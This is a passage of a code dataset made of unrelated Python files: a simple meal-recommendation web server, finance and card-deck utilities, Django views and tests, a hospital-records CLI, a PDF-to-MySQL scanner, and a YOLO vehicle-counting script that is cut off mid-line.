\"localhost\"\r\nserverPort = 8080\r\n\r\nALL_DATA = None\r\n\r\ndef parse_assist(s):\r\n s = s.replace('+',' ')\r\n s = s.replace('%2F','/')\r\n s = s.replace('%3F','?')\r\n return s\r\n \r\ndef init_profiler(usr):\r\n global ALL_DATA\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n\r\n usr_gender = usr_info['Gender']\r\n usr_height = float(int(usr_info['height'])) * 2.54 #cm\r\n usr_weight = float(int(usr_info['weight'])) / 2.2 #kg\r\n usr_age = float(int(usr_info['age']))\r\n\r\n usr_bmr = None\r\n if usr_gender == 'male':\r\n usr_bmr = 66.47 + (13.75 * usr_weight) + (5.003 * usr_height) - (6.755 * usr_age)\r\n else:\r\n usr_bmr = 655.1 +(9.563 * usr_weight) + (1.85 * usr_height) - (4.676 * usr_age)\r\n\r\n usr_info['bmr'] = usr_bmr\r\n\r\ndef get_demo_meals():\r\n meal1 = {\"Name\":\"Veggie Wrap\", \"Restaurant\":\"Zebra Lounge\",\"Cal\":300}\r\n meal2 = {\"Name\":\"Italian Sub\", \"Restaurant\":\"Zebra Lounge\",\"Cal\":550}\r\n meal3 = {\"Name\":\"Ham Sandwich\", \"Restaurant\":\"Ginger's Express\",\"Cal\":400}\r\n meal4 = {\"Name\":\"Fruit and Nut Salad\", \"Restaurant\":\"Ginger's Express\",\"Cal\":300}\r\n meal5 = {\"Name\":\"Chicken Ceasar Wrap\", \"Restaurant\":\"Au Bon Pain\",\"Cal\":480}\r\n return [meal1,meal2,meal3,meal4,meal5]\r\n\r\n\r\ndef init_recommender(usr):\r\n global ALL_DATA\r\n NDAT = ALL_DATA.NUTRITION_DATA\r\n\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n bmr = usr_info['bmr']\r\n caloric_matches = NDAT.loc[(NDAT['Cal'] >= bmr/7) & (NDAT['Cal'] <= bmr/4)]\r\n\r\n caloric_matches_random = caloric_matches.sample(4)\r\n usr_info['random meals'] = caloric_matches_random.T.to_dict().values()\r\n\r\n\r\nclass MyServer(BaseHTTPRequestHandler):\r\n def do_GET(self):\r\n \r\n global ALL_DATA\r\n global STATE\r\n\r\n print(\"REQUEST LINE: \",self.requestline)\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n if (\"login\" in self.requestline):\r\n self.login_file = open(\"./loginPage.html\")\r\n self.login_file_lines = self.login_file.readlines()\r\n for line in self.login_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n elif (\"signup\" in self.requestline):\r\n self.signup_file = open(\"./signupPage.html\")\r\n self.signup_file_lines = self.signup_file.readlines()\r\n for line in self.signup_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n elif (\"dashboard\" in self.requestline):\r\n self.dasbrd_file = open(\"./usr_dashboard.html\")\r\n self.dasbrd_file_lines = self.dasbrd_file.readlines()\r\n for line in self.dasbrd_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n else: #main webpage\r\n if (ALL_DATA == None):\r\n ALL_DATA = Data()\r\n html_file = open(\"./mydesign1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n def do_POST(self):\r\n global ALL_DATA\r\n global STATE\r\n\r\n content_length = int(self.headers['Content-Length'])\r\n \r\n #body = self.rfile.read(content_length)\r\n #print(body)\r\n print(\"POST:\", self.requestline)\r\n if (\"setupPage\" in self.requestline): #sign up preceded this\r\n (input,username,pwd) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n username = urllib.parse.unquote_plus(username)[:-6]\r\n pwd = urllib.parse.unquote_plus(pwd)\r\n print(\"username: \", username)\r\n print(\"pwd: \", pwd)\r\n ALL_DATA.add_usr(username, pwd)\r\n ALL_DATA.save()\r\n ALL_DATA.debug_print()\r\n STATE.curr_user = username\r\n \r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n self.setup_file = open(\"./setupPage.html\")\r\n self.setup_file_lines = self.setup_file.readlines()\r\n for line in self.setup_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n # elif (\"dashboardReturn\" in self.requestline) #IF HAVE TIME\r\n \r\n elif(\"dashboard\" in self.requestline): # setup preceded this\r\n print(\"goes into setupPage\")\r\n (v0,v1,v2,v3,v4,v5,v6,v7,v8) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n replies = [v0,v1,v2,v3,v4,v5,v6,v7,v8]\r\n\r\n curr_reply, curr_prompt,next_prompt = None, None, None\r\n for i in range(len(replies)):\r\n v = replies[i]\r\n if i == 0:\r\n curr_prompt = replies[0]\r\n elif i < len(replies) - 1:\r\n curr_reply, next_prompt = v.split(\"&\")\r\n curr_prompt = parse_assist(curr_prompt)\r\n curr_reply = parse_assist(curr_reply)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n curr_prompt = next_prompt\r\n else:\r\n curr_reply = parse_assist(replies[i])\r\n curr_prompt = parse_assist(curr_prompt)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n\r\n #print(ALL_DATA.USER_DATA[STATE.curr_user])\r\n init_profiler(STATE.curr_user)\r\n \r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n \r\n html_file = open(\"./usr_dashboard.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\")) #would need to change\r\n\r\n elif (\"feedback\" in self.requestline): #dashboard preceded this\r\n (v0,v1,v2,v3,v4,v5) = self.rfile.read(content_length).decode('utf-8').split('=')\r\n replies = [v0,v1,v2,v3,v4,v5]\r\n\r\n curr_reply, curr_prompt,next_prompt = None, None, None\r\n for i in range(len(replies)):\r\n v = replies[i]\r\n if i == 0:\r\n curr_prompt = replies[0]\r\n elif i < len(replies) - 1:\r\n curr_reply, next_prompt = v.split(\"&\")\r\n curr_prompt = parse_assist(curr_prompt)\r\n curr_reply = parse_assist(curr_reply)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n curr_prompt = next_prompt\r\n else:\r\n curr_reply = parse_assist(replies[i])\r\n curr_prompt = parse_assist(curr_prompt)\r\n (ALL_DATA.USER_DATA[STATE.curr_user])[curr_prompt] = curr_reply\r\n\r\n #init_rec_demo()\r\n\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n html_file = open(\"./feedback1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n #write variable part\r\n self.summarize_and_write(STATE.curr_user)\r\n\r\n html_file = open(\"./feedback2.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n \r\n else:\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/html\")\r\n self.end_headers()\r\n html_file = open(\"./mydesign1.html\")\r\n html_file_lines = html_file.readlines()\r\n for line in html_file_lines:\r\n self.wfile.write(bytes(line, \"utf-8\"))\r\n\r\n def summarize_and_write(self, usr):\r\n usr_info = ALL_DATA.USER_DATA[usr]\r\n #print(usr_info)\r\n usr_info['demo meals'] = get_demo_meals()\r\n \r\n # link interested responses to meals\r\n i = 1\r\n for meal_dict in usr_info['demo meals']:\r\n\r\n meal_dict['Interested ' + str(i)] = usr_info['Interested ' + str(i)]\r\n i += 1\r\n\r\n for k in usr_info.keys():\r\n if (not (k == 'demo meals')) and (not \"Interest\" in k) and (not (k == 'pwd')): \r\n strk = k\r\n if k == \"weightplan\": strk = \"Weight Plan\"\r\n elif k == 'weight': strk = \"Weight\"\r\n elif k == 'height': strk = \"Height\" \r\n elif k == \"What is your favorite genre of food?\": strk = \"Favorite Genre Of Food\"\r\n elif k == \"genre\": strk = \"Genre (other)\"\r\n elif k == \"genre\": strk = \"Genre (other)\"\r\n elif k == \"on/off campus?\": strk = \"On/Off Campus\"\r\n elif k == \"activity\": strk = \"Activity\"\r\n elif k == 'age': strk = 'Age'\r\n elif k == 'bmr': strk = 'BMR'\r\n info_line = ' ' + strk + ' ' + ' ' + str(usr_info[k]) + ' '\r\n self.wfile.write(bytes(info_line, 'utf-8'))\r\n \r\n\r\nclass State:\r\n def __init__(self):\r\n self.curr_user = \"\" #overwrite\r\n\r\nSTATE = State()\r\n\r\nif __name__ == \"__main__\": \r\n webServer = HTTPServer((hostName, serverPort), MyServer)\r\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\r\n\r\n try:\r\n webServer.serve_forever()\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n webServer.server_close()\r\n print(\"Server stopped.\")\r\n print(\"Server stopped.\")\r\n","sub_path":"pyweb1.py","file_name":"pyweb1.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53809940","text":"\n\nwith open('in.txt') as fh:\n s = fh.read().strip()\n \nfor i in range(14, len(s)):\n candidate = s[i-14:i] \n #print(candidate)\n if len(set(candidate)) == 14:\n print(i)\n break\n","sub_path":"2022/day06/prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"251771614","text":"from path import Path\nimport cv2\nfrom tqdm import tqdm\nimport numpy as np\nimport matplotlib.pyplot as plt\nroot =Path('/home/roit/aws/aprojects/xdr94_mono2/mc_test_gt')\nout_p = Path('./plasma_gt')\nout_p.mkdir_p()\nfiles = root.files()\n\n\ndef main():\n cnt=0\n for item in tqdm(files):\n\n img = cv2.imread(item)\n img =255- cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n img = img/np.mean(img)\n plt.imsave(out_p/item.stem+'.png',img,cmap='plasma')\n cnt+=1\n\n\n pass\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/change_color_map.py","file_name":"change_color_map.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373097138","text":"from git import Repo\nfrom anytree import Node, RenderTree\nimport os\nimport json\nimport click\n\nclass GoSPeLRepository:\n \"\"\"Represents a GoSPeL repository.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the data : create a GitPython object.\"\"\"\n self.currentPath = os.getcwd()\n self.repository = Repo(self.currentPath)\n\n def createFeature(self, name, optional):\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"listOfChildFeatures\"].append({\"name\": name, \"isOptional\": str(optional)})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added details for child feature \" + name + \" in feature \" + self.repository.active_branch.name)\n self.repository.git.branch(name)\n self.repository.git.checkout(name)\n os.remove(self.currentPath + '/dependencies.json')\n self.checkIfDependenciesFileExist()\n\n def mutex(self, name):\n click.echo('Creating mutex rule for product ' + self.repository.active_branch.name + ' and ' + name)\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"mutex\"].append({\"feature\": name})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added mutex rule for feature \" + name + \" in feature \" + self.repository.active_branch.name)\n\n def checkIfDependenciesFileExist(self):\n if (not os.path.isfile(self.currentPath + '/dependencies.json')):\n with open('dependencies.json', mode='w') as f:\n entry = json.loads('{\"currentFeature\": \"' + self.repository.active_branch.name + '\", \"listOfChildFeatures\": [], \"mutex\": [], \"require\": []}')\n json.dump(entry, f)\n f.close()\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Initial commit for product \" + self.repository.active_branch.name)\n\n def require(self, name):\n click.echo('Creating require rule for product ' + self.repository.active_branch.name + ' and ' + name)\n self.checkIfDependenciesFileExist()\n with open('dependencies.json', mode=\"r+\") as feedsjson:\n entry = json.load(feedsjson)\n entry[\"require\"].append({\"feature\": name})\n feedsjson.seek(0)\n json.dump(entry, feedsjson)\n self.repository.git.add('dependencies.json')\n self.repository.git.commit(\"-m\", \"Added require rule for feature \" + name + \" in feature \" + self.repository.active_branch.name)\n\n def show(self):\n features = []\n for head in self.repository.heads:\n features.append(Node(head.name))\n for feature in features:\n self.repository.git.checkout(feature.name)\n if (os.path.isfile(self.currentPath + '/dependencies.json')):\n with open('dependencies.json', mode=\"r+\") as f:\n entries = json.load(f)\n for entry in entries[\"listOfChildFeatures\"]:\n for currentNode in features:\n if (entry[\"name\"] == currentNode.name):\n feature.children = feature.children + (currentNode,)\n for feature in features:\n if (feature.name == \"master\"):\n from anytree.exporter import DotExporter\n DotExporter(feature).to_picture(\"visualisation.png\")\n os.system(\"open visualisation.png\")\n\n def delete(self, name): \n self.repository.git.checkout('master')\n click.echo('Deleting product ' + name)\n self.repository.git.branch('--delete', name)\n\n def edit(self, name):\n click.echo('Editing product ' + name)\n self.repository.git.checkout(name)","sub_path":"src/GospelRepository.py","file_name":"GospelRepository.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101839940","text":"from theano import tensor\n\nfrom blocks.bricks import Brick\nfrom blocks.graph import ComputationGraph\nfrom tests.bricks import TestBrick\n\n\ndef test_application_graph_auxiliary_vars():\n X = tensor.matrix('X')\n Brick.lazy = True\n brick = TestBrick()\n Y = brick.access_application_call(X)\n graph = ComputationGraph(outputs=[Y])\n test_val_found = False\n for var in graph.variables:\n if var.name == 'test_val':\n test_val_found = True\n break\n assert test_val_found\n\n\ndef test_computation_graph():\n x = tensor.matrix('x')\n y = tensor.matrix('y')\n z = x + y\n a = z.copy()\n a.name = 'a'\n b = z.copy()\n b.name = 'b'\n r = tensor.matrix('r')\n\n cg = ComputationGraph([a, b])\n assert set(cg.inputs) == {x, y}\n assert set(cg.outputs) == {a, b}\n assert set(cg.variables) == {x, y, z, a, b}\n assert ComputationGraph(a).inputs == cg.inputs\n\n cg2 = cg.replace({z: r})\n assert set(cg2.inputs) == {r}\n assert set([v.name for v in cg2.outputs]) == {'a', 'b'}\n","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163183415","text":"import os \n\n\nprint(\"\")\nprint(\"┌───────────────────────────────────────────────────────────────┐\")\nprint(\"│ 🏥 Bienvenidos al sistema de historias clínicas del hospital 🏥 │\")\nprint(\"└───────────────────────────────────────────────────────────────┘\")\nprint(\"\")\nprint(\"\")\n\n\n# **********************\n# * VARIABLES GLOBALES *\n# **********************\n\nrunning = True\ndatabase = list()\n \n# **********************\n# * FUNCIONES *\n# **********************\n\ndef mainMenuResponse(userInput):\n if userInput == 1:\n name = input(\"ingrese el nombre del paciente ▶ \")\n history = input(\"ingrese la historia clinica del paciente ▶ \")\n paciente = {\"nombre\": name, \"historia\": history }\n database.append(paciente)\n elif userInput == 2:\n name = input(\"ingrese el nombre del paciente ▶ \")\n found = False\n for i in range(len(database)):\n if database[i][\"nombre\"] == name:\n found = True\n print(\"\")\n print(\"PACIENTE ENCONTRADO | H. CLINICA ▶ \", database[i][\"historia\"] )\n \n if found == False:\n print(\"\")\n print('Paciente no encontrado')\n\n elif userInput == 3:\n\n print(\" ** LISTADO DE PACIENTES ** \")\n\n for i in range(len(database)):\n # Rjust para crear una celda de tamaño 10\n # Para que las tabulaciones no aparezcan en espacios diferentes\n\n print(\"Nombre ▶ \".ljust(10), database[i][\"nombre\"], \"\\t\\t| Historial C. ▶ \".ljust(10), database[i][\"historia\"])\n\n \n\n\ndef response_validator(response, callback):\n numb_res = 0\n if response.isdigit():\n numb_res = int(response)\n if numb_res <= 1 and numb_res >= 4:\n numb_res = False\n\n if numb_res != 0:\n callback(numb_res)\n else:\n print(response)\n print(\"Valor no valido\")\n\n\ndef show_menu():\n print(\"\")\n print(\"\\t\\t 1 - Cargar paciente\")\n print(\"\\t\\t 2 - Buscar paciente\")\n print(\"\\t\\t 3 - Listar pacientes\")\n print(\"\\t\\t 4 - Salir\")\n print(\"\")\n res = input(\"INGRESE UNA OPCION ▶ \")\n os.system('clear')\n if res == '4':\n return False\n\n response_validator(res, mainMenuResponse)\n return res\n\n# **********************\n# * LOOP PRINCIPAL *\n# **********************\n\nwhile running:\n running = show_menu()\n ","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"586207255","text":"import numpy as np\nfrom scipy.stats import norm\nfrom scipy import optimize\n\n# undiscounted black option price\ndef black_option_price(f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n v, # implied volatility, double\n c_or_p # call (1) or put (-1), integer\n ):\n\n d_1 = (np.log(f/k)+0.5*v*v*t)/(v*np.sqrt(t))\n d_2 = d_1 - v*np.sqrt(t)\n if c_or_p == 1 :\n return f * norm.cdf(d_1) - k * norm.cdf(d_2)\n elif c_or_p == -1 :\n return k * norm.cdf(-d_2) - f * norm.cdf(-d_1)\n else:\n raise ValueError('c_or_p is expected to be 1 for call or -1 for put.')\n\n#undiscounted black option vega\ndef black_option_vega(f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n v # implied volatility, double\n ):\n\n d_1 = (np.log(f / k) + 0.5 * v * v * t) / (v * np.sqrt(t))\n return f * norm.pdf(d_1) * np.sqrt(t)\n\n#compute black implied volatility\ndef black_implied_vol(p, # option price, double\n f, # forward, double\n k, # strike, double\n t, # time to maturity, double\n c_or_p, # call (1) or put (-1), integer\n init_guess = 0.2 # initial guess\n ):\n\n f_ivol = lambda x: black_option_price(f, k, t, x, c_or_p) - p\n f_vega = lambda x: black_option_vega(f, k, t, x)\n black_implied_vol = optimize.newton(f_ivol, init_guess, f_vega)\n\n return black_implied_vol","sub_path":"finite_difference/black_analytics.py","file_name":"black_analytics.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"341084436","text":"from django.shortcuts import render, redirect\n\nfrom blog.forms import NewPostForm\nfrom blog.models import Post\n\n\ndef PostIndexView(request):\n if request.method == 'POST':\n fr = NewPostForm(request.POST)\n if fr.is_valid():\n fr.save()\n return redirect('blog_urls:blog_url')\n else:\n posts = Post.objects.all().order_by('-created_date')\n Form = NewPostForm()\n return render(request, 'index.html', {'tPosts':posts ,'tForm':Form})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"486885511","text":"class WrapKeyPoint(object):\n def __init__(self, rect, Id,bboxId):\n self.bboxId=bboxId\n self.id=Id\n self.rect = rect\n\n\nclass WrapBoundingBox(object):\n def __init__(self, rect,cls,kpointCnt, kpointIds=None):\n self.rect = rect\n self.kpointIds={}\n self.cls=cls\n if kpointIds == None:\n for i in range(kpointCnt):\n self.kpointIds[i]=None\n else:\n self.kpointIds = kpointIds\n","sub_path":"Annotion.py","file_name":"Annotion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"128300715","text":"# Django\nfrom django.test import TestCase\n\n# Python\nimport json\n\n# Django Rest Framework\nfrom rest_framework.test import APIClient\n\n# Models\nfrom movies.models import Movies\nfrom users.models import User\nfrom movies.models.comments import Comment\n\n\nclass TestSetUp(TestCase):\n\n def setUp(self):\n # Create model for user\n user = User(\n email='testing_login@cosasdedevs.com',\n first_name='Testing',\n last_name='Testing',\n username='testing_login'\n )\n user.set_password('admin123')\n user.save()\n\n # Create model for movies\n self.movie = Movies.objects.create(\n name='titanic',\n gender='AC',\n author='leonardo',\n production='netflix',\n duration='01:30:00',\n date_launch='1997-10-19',\n user=user\n )\n\n self.movie = Movies.objects.create(\n name='titanic 2.0',\n gender='SE',\n author='leonardo',\n production='netflix',\n duration='02:30:00',\n date_launch='1977-10-19',\n user=user\n )\n\n # Create model for comment\n self.comment = Comment.objects.create(\n user=user,\n movie=self.movie,\n description=\"sdfsdfsdfsdfdsfsdfdfsffsdf\"\n )\n\n # Login\n client = APIClient()\n response = client.post(\n '/users/login/', {\n 'email': 'testing_login@cosasdedevs.com',\n 'password': 'admin123',\n },\n format='json'\n )\n\n result = json.loads(response.content)\n self.access_token = result['access_token']\n self.user = user\n\n # Authenticacion\n self.client = APIClient()\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.access_token)\n\n return super().setUp()","sub_path":"movies/test/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"562302295","text":"import random\r\n#\r\n\r\nclass card_deck:\r\n\r\n '''Creates a deck of cards based on the number of player can deal a card\r\n on request, passing card reference and removing from the deck'''\r\n\r\n def __init__(self, number_of_players):\r\n self.number_of_players = number_of_players\r\n\r\n standard_pack = [\r\n 'H2', 'H3', 'H4', 'H5', 'H6', 'H7', 'H8', 'H9', 'H10', 'H11', 'H12',\r\n 'H13', 'H14', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10',\r\n 'C11', 'C12', 'C13', 'C14', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8',\r\n 'D9', 'D10', 'D11', 'D12', 'D13', 'D14', 'S2', 'S3', 'S4', 'S5', 'S6',\r\n 'S7', 'S8', 'S9', 'S10', 'S11', 'S12', 'S13', 'S14'\r\n ]\r\n\r\n number_of_packs = 1\r\n current_deck = 52\r\n cards_per_player = current_deck / self.number_of_players\r\n\r\n while cards_per_player < 10:\r\n current_deck = current_deck + 52\r\n cards_per_player = current_deck / self.number_of_players\r\n number_of_packs = int(current_deck / 52)\r\n\r\n self.card_pack = []\r\n\r\n for i in range(0, number_of_packs):\r\n self.card_pack = self.card_pack + standard_pack\r\n\r\n def deal_a_card(self):\r\n if len(self.card_pack) != 1:\r\n card_index = random.randint(0, len(self.card_pack)-1)\r\n self.card_to_deal = self.card_pack[card_index]\r\n del self.card_pack[card_index]\r\n else:\r\n self.card_to_deal = self.card_pack[0]\r\n\r\n return self.card_to_deal\r\n","sub_path":"deck_unit.py","file_name":"deck_unit.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"472068194","text":"import PyPDF2 as pdf\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pymysql\r\n\r\nconnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"toor\", db=\"Core\")\r\ncursor = connection.cursor()\r\n\r\nPDFfile = open(\"ABC COMPLETION LISTS.pdf\", \"rb\")\r\npdfRead = pdf.PdfFileReader(PDFfile)\r\n\r\nx = pdfRead.getPage(0)\r\n\r\ntext = x.extractText()\r\n\r\ndata = {'Floor':[],'Section':[], 'Unit':[], 'Date Complete':[], 'Contractor':[], 'Problem':[], 'Status':[]}\r\n\r\ndf = pd.DataFrame(data)\r\n\r\nsql1 = \"insert into organized(floor, section, unit, date_done, contractor, problem, status_check) values (%s, %s, %s, %s, %s, %s, %s)\"\r\n\r\n# floors: 1-4\r\n# section a-c\r\n# unit 440-454\r\n# problems:\r\n# •\tBR DOOR NEEDS PAINT\r\n# •\tPEEPHOLE NEEDED\r\n# •\tMAJOR CUTS IN DRYWALL\r\n# •\tVENT COVER\r\n# •\tDOORS NEEDING PAINT\r\n# •\tACCESS PANEL COVERS\r\n# •\tFART FAN\r\n# •\tSHOWER RODS\r\n# •\tACCESS PANEL COVERS\r\n# •\tKNEEBOARD NEEDS\r\n# •\tTRIM NEEDS PAINT\r\n# •\tOUTLET COVERS\r\n# •\tTHERMOSTAT\r\n# •\tSMOKE\r\n# •\tCARPET\r\n# •\tLIGHT IN KITCHEN\r\n\r\n\r\ninsert_data = ('440', 'N', 'N', 'BR DOOR NEEDS PAINT', 'Not', 'N')\r\n\r\n\r\n\r\nif \"ECTION\" and \"A\" and \"440\" and \"BR DOOR NEEDS PAINT\" and \"Floor\" and \"4\" in text:\r\n cursor.execute(sql1, insert_data)\r\n connection.commit()\r\n\r\nelif \"SECTION B\" and \"461\" and \"SMOKE MISSING\" in text:\r\n data = {'Section': ['B'], 'Unit': ['440'], 'Date Complete': ['A'], 'Contractor': ['N/A'], 'Problem': ['1'], 'Status': ['N/A']}\r\n df = pd.DataFrame(data)\r\n\r\nprint(df)","sub_path":"PreSQLScanner.py","file_name":"PreSQLScanner.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"450587118","text":"import os\nimport cv2\nimport time\nimport numpy as np\nimport tqdm\nimport imutils\n\nmemory = {}\nline = [(43, 543), (550, 655)]\ncounter = 0\nCOLORS = np.random.randint(0, 255, size=(200, 3),\n\tdtype=\"uint8\")\n\ndef intersect(A,B,C,D):\n\treturn ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)\n\n\ndef ccw(A,B,C):\n print((C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0]))\n\n return (C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0])\n\n# yolo label 가져오기\nlabelsPath = os.path.sep.join([\"yolo-coco\", \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n#print(\"[INFO] loading YOLO from disk...\")\nweightsPath = os.path.sep.join([\"yolo-coco\", \"yolov3.weights\"])\nconfigPath = os.path.sep.join([\"yolo-coco\", \"yolov3.cfg\"])\n\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\nln = net.getLayerNames()\nprint(ln)\nprint(net.getUnconnectedOutLayers())\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nprint(ln)\n\nvs = cv2.VideoCapture(\"input/highway.mp4\")\nwriter = None\n(W, H) = (None, None)\n\nframeIndex = 0\n\n(grabbed, frame) = vs.read()\n\nblob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),\n\t\tswapRB=True, crop=False)\n\nnet.setInput(blob)\n\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\n\n# 검출된 bounding boxes, confidences, class IDs 각각 초기화\nboxes = []\nconfidences = []\nclassIDs = []\n\ntry:\n\tprop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \\\n\t\telse cv2.CAP_PROP_FRAME_COUNT\n\ttotal = int(vs.get(prop))\n\tprint(\"[INFO] {} total frames in video\".format(total))\n\n# 비디오파일의 총 frame 수를 찾는데 에러가 발생할 경우\nexcept:\n\tprint(\"[INFO] could not determine # of frames in video\")\n\tprint(\"[INFO] no approx. completion time can be provided\")\n\ttotal = -1\n\nfor i in tqdm(range(1, 600)):\n # frame을 계속 읽어나간다.\n (grabbed, frame) = vs.read()\n\n # 만약 frame을 잡지 못하면 종료\n if not grabbed:\n break\n\n # frame의 공간 크기가 존재하지않으면 만들어준다\n if W is None or H is None:\n (H, W) = frame.shape[:2]\n\n # 입력 frame에서 blob(대용량 바이너리 객체)을 구하고 forward를 수행한다.\n # YOLO 객체 검출을 통과하면 bounding box와 관련 확률을 제공한다.\n blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),\n swapRB=True, crop=False)\n net.setInput(blob)\n start = time.time()\n layerOutputs = net.forward(ln)\n end = time.time()\n\n # 검출된 bounding boxes, confidences, class IDs 각각 초기화\n boxes = []\n confidences = []\n classIDs = []\n\n # 각 output에 대해 반복\n for output in layerOutputs:\n # 각 output에서 각각 검출된 것에 대해 반복\n for detection in output:\n # 검출된 것에 대한 class IDs, confidence(확률) 추출\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n\n # 최소 확률보다 큰 확률을 가지는 취약한 예측을 걸러낸다\n if confidence > 0.5:\n # YOLO가 실제로 경계 상자의 중심(x, y) 좌표에 이어\n # 상자의 폭과 높이를 반환한다는 점을 염두에 두고,\n # 이미지 크기에 비례하여 경계 상자 좌표를 다시 조정한다.\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype(\"int\")\n\n # 중앙 (x,y)를 사용하여 bounding box의 왼쪽 위 모서리 구함\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n\n # bounding box coordinates,confidences, class IDs 추가\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\n print(\"boxs: \",boxes)\n print(\"confidences: \",confidences)\n\n # 겹치는 bounding boxe를 위한 non-maxima suppression 사용\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\n\n print(idxs.flatten())\n\n dets = []\n if len(idxs) > 0:\n # 우리가 가지는 지표 만큼 반복\n for i in idxs.flatten():\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n dets.append([x, y, x + w, y + h, confidences[i]])\n\n np.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\n dets = 